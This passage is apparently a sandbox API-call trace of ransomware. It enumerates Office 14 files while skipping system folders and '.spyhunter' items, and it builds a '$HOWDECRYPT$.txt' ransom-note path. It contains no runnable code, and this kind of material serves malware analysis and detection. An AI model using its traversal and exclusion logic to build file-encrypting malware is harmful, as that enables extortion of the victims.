returned 0x354528 [0087.428] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x950) returned 0x3867e8 [0087.428] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.428] lstrcmpiW (lpString1="MSOINTL.REST.IDX_DLL", lpString2="Windows") returned -1 [0087.428] lstrlenW (lpString="Windows") returned 7 [0087.428] lstrcmpiW (lpString1="MSOINTL.REST.IDX_DLL", lpString2="$Recycle.bin") returned 1 [0087.428] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.428] lstrcmpiW (lpString1="MSOINTL.REST.IDX_DLL", lpString2="System Volume Information") returned -1 [0087.428] lstrlenW (lpString="System Volume Information") returned 25 [0087.428] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 85 [0087.428] StrStrIW (lpFirst="MSOINTL.REST.IDX_DLL", lpSrch=".spyhunter") returned 0x0 [0087.428] lstrcmpW (lpString1="MSOINTL.REST.IDX_DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.428] lstrcmpW (lpString1="MSOINTL.REST.IDX_DLL", lpString2="_uninstalling_.png") returned 1 [0087.428] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 85 [0087.428] GetProcessHeap () returned 0x2c0000 [0087.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x354620 [0087.428] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x958) returned 0x3867e8 [0087.428] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.428] lstrcmpiW (lpString1="MSSOAPR3.DLL", lpString2="Windows") returned -1 [0087.428] lstrlenW (lpString="Windows") returned 7 [0087.428] lstrcmpiW (lpString1="MSSOAPR3.DLL", lpString2="$Recycle.bin") returned 1 [0087.428] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.428] lstrcmpiW (lpString1="MSSOAPR3.DLL", lpString2="System Volume Information") returned -1 [0087.429] lstrlenW (lpString="System Volume Information") returned 25 [0087.429] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 77 [0087.429] StrStrIW (lpFirst="MSSOAPR3.DLL", lpSrch=".spyhunter") returned 0x0 [0087.429] lstrcmpW (lpString1="MSSOAPR3.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.429] lstrcmpW (lpString1="MSSOAPR3.DLL", lpString2="_uninstalling_.png") returned 1 [0087.429] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 77 [0087.429] GetProcessHeap () returned 0x2c0000 [0087.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372cf8 [0087.429] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x960) returned 0x3867e8 [0087.429] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.429] lstrcmpiW (lpString1="OARPMANR.DLL", lpString2="Windows") returned -1 [0087.429] lstrlenW (lpString="Windows") returned 7 [0087.429] lstrcmpiW (lpString1="OARPMANR.DLL", lpString2="$Recycle.bin") returned 1 [0087.429] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.429] lstrcmpiW (lpString1="OARPMANR.DLL", lpString2="System Volume Information") returned -1 [0087.429] lstrlenW (lpString="System Volume Information") returned 25 [0087.429] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 77 [0087.429] StrStrIW (lpFirst="OARPMANR.DLL", lpSrch=".spyhunter") returned 0x0 [0087.429] lstrcmpW (lpString1="OARPMANR.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.429] lstrcmpW (lpString1="OARPMANR.DLL", lpString2="_uninstalling_.png") returned 1 [0087.429] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 77 [0087.429] GetProcessHeap () returned 0x2c0000 [0087.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372de0 [0087.429] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x968) returned 0x3867e8 [0087.429] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.429] lstrcmpiW (lpString1="README.HTM", lpString2="Windows") returned -1 [0087.429] lstrlenW (lpString="Windows") returned 7 [0087.429] lstrcmpiW (lpString1="README.HTM", lpString2="$Recycle.bin") returned 1 [0087.429] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.430] lstrcmpiW (lpString1="README.HTM", lpString2="System Volume Information") returned -1 [0087.430] lstrlenW (lpString="System Volume Information") returned 25 [0087.430] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 75 [0087.441] StrStrIW (lpFirst="README.HTM", lpSrch=".spyhunter") returned 0x0 [0087.441] lstrcmpW (lpString1="README.HTM", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.441] lstrcmpW (lpString1="README.HTM", lpString2="_uninstalling_.png") returned 1 [0087.441] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 75 [0087.441] GetProcessHeap () returned 0x2c0000 [0087.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x384b80 [0087.442] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x960) returned 0x3867e8 [0087.442] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.442] lstrcmpiW (lpString1="xlsrvintl.dll", lpString2="Windows") returned 1 [0087.442] lstrlenW (lpString="Windows") returned 7 [0087.442] lstrcmpiW (lpString1="xlsrvintl.dll", lpString2="$Recycle.bin") returned 1 [0087.442] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.442] lstrcmpiW (lpString1="xlsrvintl.dll", lpString2="System Volume Information") returned 1 [0087.442] lstrlenW (lpString="System Volume Information") returned 25 [0087.442] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 78 [0087.442] StrStrIW (lpFirst="xlsrvintl.dll", lpSrch=".spyhunter") returned 0x0 [0087.442] lstrcmpW (lpString1="xlsrvintl.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.442] lstrcmpW (lpString1="xlsrvintl.dll", lpString2="_uninstalling_.png") returned 1 [0087.442] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 78 [0087.442] GetProcessHeap () returned 0x2c0000 [0087.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x374130 [0087.442] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x968) returned 0x3867e8 [0087.443] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0087.443] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0087.444] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\$HOWDECRYPT$.txt") returned 81 [0087.444] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\$HOWDECRYPT$.txt") returned 81 [0087.444] GetProcessHeap () returned 0x2c0000 [0087.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x329278 [0087.444] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x970) returned 0x3867e8 [0087.445] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.445] lstrcmpiW (lpString1="ACECORE.DLL", lpString2="Windows") returned -1 [0087.445] lstrlenW (lpString="Windows") returned 7 [0087.445] lstrcmpiW (lpString1="ACECORE.DLL", lpString2="$Recycle.bin") returned 1 [0087.445] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.445] lstrcmpiW (lpString1="ACECORE.DLL", lpString2="System Volume Information") returned -1 [0087.445] lstrlenW (lpString="System Volume Information") returned 25 [0087.445] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 71 [0087.445] StrStrIW (lpFirst="ACECORE.DLL", lpSrch=".spyhunter") returned 0x0 [0087.445] lstrcmpW (lpString1="ACECORE.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.445] lstrcmpW (lpString1="ACECORE.DLL", lpString2="_uninstalling_.png") returned 1 [0087.445] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned 71 [0087.445] GetProcessHeap () returned 0x2c0000 [0087.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x324638 [0087.445] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x978) returned 0x3867e8 [0087.446] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.446] lstrcmpiW (lpString1="ACEDAO.DLL", lpString2="Windows") returned -1 [0087.446] lstrlenW (lpString="Windows") returned 7 [0087.446] lstrcmpiW (lpString1="ACEDAO.DLL", lpString2="$Recycle.bin") returned 1 [0087.446] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.446] lstrcmpiW (lpString1="ACEDAO.DLL", lpString2="System Volume Information") returned -1 [0087.446] lstrlenW (lpString="System Volume Information") returned 25 [0087.446] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 70 [0087.446] StrStrIW (lpFirst="ACEDAO.DLL", lpSrch=".spyhunter") returned 0x0 [0087.446] lstrcmpW (lpString1="ACEDAO.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.446] lstrcmpW (lpString1="ACEDAO.DLL", lpString2="_uninstalling_.png") returned 1 [0087.446] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 70 [0087.446] GetProcessHeap () returned 0x2c0000 [0087.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x324560 [0087.446] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x980) returned 0x3867e8 [0087.446] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.446] lstrcmpiW (lpString1="ACEERR.DLL", lpString2="Windows") returned -1 [0087.446] lstrlenW (lpString="Windows") returned 7 [0087.446] lstrcmpiW (lpString1="ACEERR.DLL", lpString2="$Recycle.bin") returned 1 [0087.446] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.446] lstrcmpiW (lpString1="ACEERR.DLL", lpString2="System Volume Information") returned -1 [0087.446] lstrlenW (lpString="System Volume Information") returned 25 [0087.447] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 70 [0087.447] StrStrIW (lpFirst="ACEERR.DLL", lpSrch=".spyhunter") returned 0x0 [0087.447] lstrcmpW (lpString1="ACEERR.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.447] lstrcmpW (lpString1="ACEERR.DLL", lpString2="_uninstalling_.png") returned 1 [0087.447] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned 70 [0087.447] GetProcessHeap () returned 0x2c0000 [0087.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x3243b0 [0087.447] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x988) returned 0x3867e8 [0087.447] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.447] lstrcmpiW (lpString1="ACEES.DLL", lpString2="Windows") returned -1 [0087.447] lstrlenW (lpString="Windows") returned 7 [0087.447] lstrcmpiW (lpString1="ACEES.DLL", lpString2="$Recycle.bin") returned 1 [0087.447] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.447] lstrcmpiW (lpString1="ACEES.DLL", lpString2="System Volume Information") returned -1 [0087.447] lstrlenW (lpString="System Volume Information") returned 25 [0087.447] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 69 [0087.447] StrStrIW (lpFirst="ACEES.DLL", lpSrch=".spyhunter") returned 0x0 [0087.447] lstrcmpW (lpString1="ACEES.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.447] lstrcmpW (lpString1="ACEES.DLL", lpString2="_uninstalling_.png") returned 1 [0087.448] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEES.DLL") returned 69 [0087.448] GetProcessHeap () returned 0x2c0000 [0087.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x324488 [0087.448] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x990) returned 0x3867e8 [0087.448] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.448] lstrcmpiW (lpString1="ACEEXCH.DLL", lpString2="Windows") returned -1 [0087.448] lstrlenW (lpString="Windows") returned 7 [0087.448] lstrcmpiW (lpString1="ACEEXCH.DLL", lpString2="$Recycle.bin") returned 1 [0087.448] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.448] lstrcmpiW (lpString1="ACEEXCH.DLL", lpString2="System Volume Information") returned -1 [0087.448] lstrlenW (lpString="System Volume Information") returned 25 [0087.448] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 71 [0087.448] StrStrIW (lpFirst="ACEEXCH.DLL", lpSrch=".spyhunter") returned 0x0 [0087.448] lstrcmpW (lpString1="ACEEXCH.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.448] lstrcmpW (lpString1="ACEEXCH.DLL", lpString2="_uninstalling_.png") returned 1 [0087.448] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL") returned 71 [0087.448] GetProcessHeap () returned 0x2c0000 [0087.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x33f948 [0087.450] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x998) returned 0x3867e8 [0087.450] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.450] lstrcmpiW (lpString1="ACEEXCL.DLL", lpString2="Windows") returned -1 [0087.450] lstrlenW (lpString="Windows") returned 7 [0087.450] lstrcmpiW (lpString1="ACEEXCL.DLL", lpString2="$Recycle.bin") returned 1 [0087.450] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.450] lstrcmpiW (lpString1="ACEEXCL.DLL", lpString2="System Volume Information") returned -1 [0087.450] lstrlenW (lpString="System Volume Information") returned 25 [0087.450] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 71 [0087.450] StrStrIW (lpFirst="ACEEXCL.DLL", lpSrch=".spyhunter") returned 0x0 [0087.450] lstrcmpW (lpString1="ACEEXCL.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.450] lstrcmpW (lpString1="ACEEXCL.DLL", lpString2="_uninstalling_.png") returned 1 [0087.450] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCL.DLL") returned 71 [0087.451] GetProcessHeap () returned 0x2c0000 [0087.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x33fa20 [0087.451] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9a0) returned 0x3867e8 [0087.451] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.451] lstrcmpiW (lpString1="ACEODBC.DLL", lpString2="Windows") returned -1 [0087.451] lstrlenW (lpString="Windows") returned 7 [0087.451] lstrcmpiW (lpString1="ACEODBC.DLL", lpString2="$Recycle.bin") returned 1 [0087.451] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.451] lstrcmpiW (lpString1="ACEODBC.DLL", lpString2="System Volume Information") returned -1 [0087.451] lstrlenW (lpString="System Volume Information") returned 25 [0087.451] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 71 [0087.451] StrStrIW (lpFirst="ACEODBC.DLL", lpSrch=".spyhunter") returned 0x0 [0087.451] lstrcmpW (lpString1="ACEODBC.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.451] lstrcmpW (lpString1="ACEODBC.DLL", lpString2="_uninstalling_.png") returned 1 [0087.451] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODBC.DLL") returned 71 [0087.451] GetProcessHeap () returned 0x2c0000 [0087.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x33faf8 [0087.451] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9a8) returned 0x3867e8 [0087.451] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.451] lstrcmpiW (lpString1="ACEODDBS.DLL", lpString2="Windows") returned -1 [0087.452] lstrlenW (lpString="Windows") returned 7 [0087.452] lstrcmpiW (lpString1="ACEODDBS.DLL", lpString2="$Recycle.bin") returned 1 [0087.452] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.452] lstrcmpiW (lpString1="ACEODDBS.DLL", lpString2="System Volume Information") returned -1 [0087.452] lstrlenW (lpString="System Volume Information") returned 25 [0087.452] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 72 [0087.452] StrStrIW (lpFirst="ACEODDBS.DLL", lpSrch=".spyhunter") returned 0x0 [0087.452] lstrcmpW (lpString1="ACEODDBS.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.452] lstrcmpW (lpString1="ACEODDBS.DLL", lpString2="_uninstalling_.png") returned 1 [0087.452] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 72 [0087.452] GetProcessHeap () returned 0x2c0000 [0087.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x384c60 [0087.452] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9b0) returned 0x3867e8 [0087.452] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.452] lstrcmpiW (lpString1="ACEODEXL.DLL", lpString2="Windows") returned -1 [0087.452] lstrlenW (lpString="Windows") returned 7 [0087.452] lstrcmpiW (lpString1="ACEODEXL.DLL", lpString2="$Recycle.bin") returned 1 [0087.452] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.452] lstrcmpiW (lpString1="ACEODEXL.DLL", lpString2="System Volume Information") returned -1 [0087.452] lstrlenW (lpString="System Volume Information") returned 25 [0087.452] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 72 [0087.452] StrStrIW (lpFirst="ACEODEXL.DLL", lpSrch=".spyhunter") returned 0x0 [0087.452] lstrcmpW (lpString1="ACEODEXL.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.452] lstrcmpW (lpString1="ACEODEXL.DLL", lpString2="_uninstalling_.png") returned 1 [0087.452] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODEXL.DLL") returned 72 [0087.452] GetProcessHeap () returned 0x2c0000 [0087.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x384d40 [0087.452] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9b8) returned 0x3867e8 [0087.452] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.452] lstrcmpiW (lpString1="ACEODTXT.DLL", lpString2="Windows") returned -1 [0087.453] lstrlenW (lpString="Windows") returned 7 [0087.453] lstrcmpiW (lpString1="ACEODTXT.DLL", lpString2="$Recycle.bin") returned 1 [0087.453] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.453] lstrcmpiW (lpString1="ACEODTXT.DLL", lpString2="System Volume Information") returned -1 [0087.453] lstrlenW (lpString="System Volume Information") returned 25 [0087.453] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 72 [0087.453] StrStrIW (lpFirst="ACEODTXT.DLL", lpSrch=".spyhunter") returned 0x0 [0087.453] lstrcmpW (lpString1="ACEODTXT.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.453] lstrcmpW (lpString1="ACEODTXT.DLL", lpString2="_uninstalling_.png") returned 1 [0087.453] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODTXT.DLL") returned 72 [0087.453] GetProcessHeap () returned 0x2c0000 [0087.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x384e20 [0087.453] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9c0) returned 0x3867e8 [0087.453] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.453] lstrcmpiW (lpString1="ACEOLEDB.DLL", lpString2="Windows") returned -1 [0087.453] lstrlenW (lpString="Windows") returned 7 [0087.453] lstrcmpiW (lpString1="ACEOLEDB.DLL", lpString2="$Recycle.bin") returned 1 [0087.453] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.453] lstrcmpiW (lpString1="ACEOLEDB.DLL", lpString2="System Volume Information") returned -1 [0087.453] lstrlenW (lpString="System Volume Information") returned 25 [0087.453] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 72 [0087.453] StrStrIW (lpFirst="ACEOLEDB.DLL", lpSrch=".spyhunter") returned 0x0 [0087.453] lstrcmpW (lpString1="ACEOLEDB.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.453] lstrcmpW (lpString1="ACEOLEDB.DLL", lpString2="_uninstalling_.png") returned 1 [0087.453] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 72 [0087.453] GetProcessHeap () returned 0x2c0000 [0087.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x384f00 [0087.453] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9c8) returned 0x3867e8 [0087.453] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.453] lstrcmpiW (lpString1="ACER3X.DLL", lpString2="Windows") returned -1 [0087.453] lstrlenW (lpString="Windows") returned 7 [0087.453] lstrcmpiW (lpString1="ACER3X.DLL", lpString2="$Recycle.bin") returned 1 [0087.454] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.454] lstrcmpiW (lpString1="ACER3X.DLL", lpString2="System Volume Information") returned -1 [0087.454] lstrlenW (lpString="System Volume Information") returned 25 [0087.454] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 70 [0087.454] StrStrIW (lpFirst="ACER3X.DLL", lpSrch=".spyhunter") returned 0x0 [0087.454] lstrcmpW (lpString1="ACER3X.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.454] lstrcmpW (lpString1="ACER3X.DLL", lpString2="_uninstalling_.png") returned 1 [0087.454] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 70 [0087.454] GetProcessHeap () returned 0x2c0000 [0087.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x33fbd0 [0087.454] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9d0) returned 0x3867e8 [0087.454] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.454] lstrcmpiW (lpString1="ACERCLR.DLL", lpString2="Windows") returned -1 [0087.454] lstrlenW (lpString="Windows") returned 7 [0087.454] lstrcmpiW (lpString1="ACERCLR.DLL", lpString2="$Recycle.bin") returned 1 [0087.454] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.454] lstrcmpiW (lpString1="ACERCLR.DLL", lpString2="System Volume Information") returned -1 [0087.454] lstrlenW (lpString="System Volume Information") returned 25 [0087.454] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 71 [0087.454] StrStrIW (lpFirst="ACERCLR.DLL", lpSrch=".spyhunter") returned 0x0 [0087.454] lstrcmpW (lpString1="ACERCLR.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.454] lstrcmpW (lpString1="ACERCLR.DLL", lpString2="_uninstalling_.png") returned 1 [0087.454] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 71 [0087.454] GetProcessHeap () returned 0x2c0000 [0087.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x33fca8 [0087.454] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x9d8) returned 0x3867e8 [0087.454] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0087.454] lstrcmpiW (lpString1="ACEREP.DLL", lpString2="Windows") returned -1 [0087.454] lstrlenW (lpString="Windows") returned 7 [0087.454] lstrcmpiW (lpString1="ACEREP.DLL", lpString2="$Recycle.bin") returned 1 [0087.454] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.455] lstrcmpiW 